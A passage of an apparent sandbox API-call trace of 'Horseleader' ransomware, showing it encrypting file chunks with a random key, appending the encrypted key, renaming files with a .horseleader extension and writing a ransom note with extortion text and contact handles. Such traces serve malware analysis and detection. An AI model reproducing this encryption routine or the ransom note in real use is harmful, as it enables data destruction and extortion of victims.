(lpFirst="MSB1ARFR.ITS", lpSrch=".txt") returned 0x0 [0248.302] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1658904) returned 1 [0248.302] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.302] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.304] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, 
lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.304] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.306] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xc800c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.306] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.308] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.308] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.309] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x190018, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.309] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.311] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.311] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.312] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, 
lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.312] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.312] CloseHandle (hObject=0x1a4) returned 1 [0248.312] GetProcessHeap () returned 0x780000 [0248.312] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.312] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.horseleader") returned 89 [0248.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.horseleader")) returned 1 [0248.313] GetProcessHeap () returned 0x780000 [0248.314] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.314] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b324b00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b324b00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x195018, dwReserved0=0x96d8c05d, 
dwReserved1=0xeae5f6ce, cFileName="MSB1ARFR.ITS", cAlternateFileName="")) returned 0 [0248.314] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.314] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\#Decrypt#.txt") returned 78 [0248.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.315] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.315] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.316] lstrlenA (lpString="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") returned 1368 [0248.316] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.316] CloseHandle (hObject=0x158) returned 1 [0248.317] GetProcessHeap () returned 0x780000 [0248.317] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.317] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ENES", cAlternateFileName="")) returned 1 [0248.317] lstrcmpiW (lpString1="ENES", lpString2="Windows") returned -1 [0248.317] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES") returned 64 [0248.317] lstrcmpW (lpString1="ENES", lpString2=".") returned 1 [0248.317] lstrcmpW (lpString1="ENES", lpString2="..") returned 1 [0248.317] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.317] GetProcessHeap () returned 0x780000 [0248.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0248.317] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*") returned 66 [0248.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.319] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\.") returned 66 [0248.319] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54ce0b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54ce0b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.319] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\..") returned 67 [0248.319] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.319] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0248.319] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xeed1e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENES.ITS", cAlternateFileName="")) returned 1 [0248.319] lstrcmpiW (lpString1="MSB1ENES.ITS", lpString2="Windows") returned -1 [0248.319] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned 77 [0248.319] StrStrIW (lpFirst="MSB1ENES.ITS", lpSrch=".horseleader") returned 0x0 [0248.320] lstrcmpW (lpString1="MSB1ENES.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.320] lstrcmpW (lpString1="MSB1ENES.ITS", lpString2="_uninstalling_.png") returned 1 [0248.320] lstrlenW (lpString=".testttjffg") returned 11 [0248.320] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS", lpSrch=".testttjffg") returned 0x0 [0248.320] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.320] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.320] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 
[0248.321] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS") returned 77 [0248.321] StrStrW (lpFirst="MSB1ENES.ITS", lpSrch=".txt") returned 0x0 [0248.321] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=978206) returned 1 [0248.321] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.321] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.325] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.325] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.327] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x74e8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.327] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.329] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.329] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.330] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xe9d1e, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.330] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.332] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.332] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.333] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.333] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.333] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.333] CloseHandle (hObject=0x1a4) returned 1 [0248.334] GetProcessHeap () returned 0x780000 [0248.334] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.334] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.horseleader") returned 89 [0248.334] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\ENES\\MSB1ENES.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\msb1enes.its.horseleader")) returned 1 [0248.335] GetProcessHeap () returned 0x780000 [0248.335] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.335] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xeed1e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENES.ITS", cAlternateFileName="")) returned 0 [0248.335] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.335] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\#Decrypt#.txt") returned 78 [0248.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENES\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enes\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.336] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.336] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.337] lstrlenA (lpString="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") returned 1368 [0248.337] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.337] CloseHandle (hObject=0x158) returned 1 [0248.338] GetProcessHeap () returned 0x780000 [0248.338] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.338] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ENFR", cAlternateFileName="")) returned 1 [0248.338] lstrcmpiW (lpString1="ENFR", lpString2="Windows") returned -1 [0248.338] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR") returned 64 [0248.338] lstrcmpW (lpString1="ENFR", lpString2=".") returned 1 [0248.338] lstrcmpW (lpString1="ENFR", lpString2="..") returned 1 [0248.338] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.338] GetProcessHeap () returned 0x780000 [0248.338] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dc820 [0248.338] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*") returned 66 [0248.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.338] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.338] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\.") returned 66 [0248.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.339] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.339] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.339] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\..") returned 67 [0248.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.339] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0248.339] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xe64da, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENFR.ITS", cAlternateFileName="")) returned 1 [0248.339] lstrcmpiW (lpString1="MSB1ENFR.ITS", lpString2="Windows") returned -1 [0248.339] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned 77 [0248.339] StrStrIW (lpFirst="MSB1ENFR.ITS", lpSrch=".horseleader") returned 0x0 [0248.339] lstrcmpW (lpString1="MSB1ENFR.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.339] lstrcmpW (lpString1="MSB1ENFR.ITS", lpString2="_uninstalling_.png") returned 1 [0248.339] lstrlenW (lpString=".testttjffg") returned 11 [0248.339] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS", lpSrch=".testttjffg") returned 0x0 [0248.339] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.339] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), 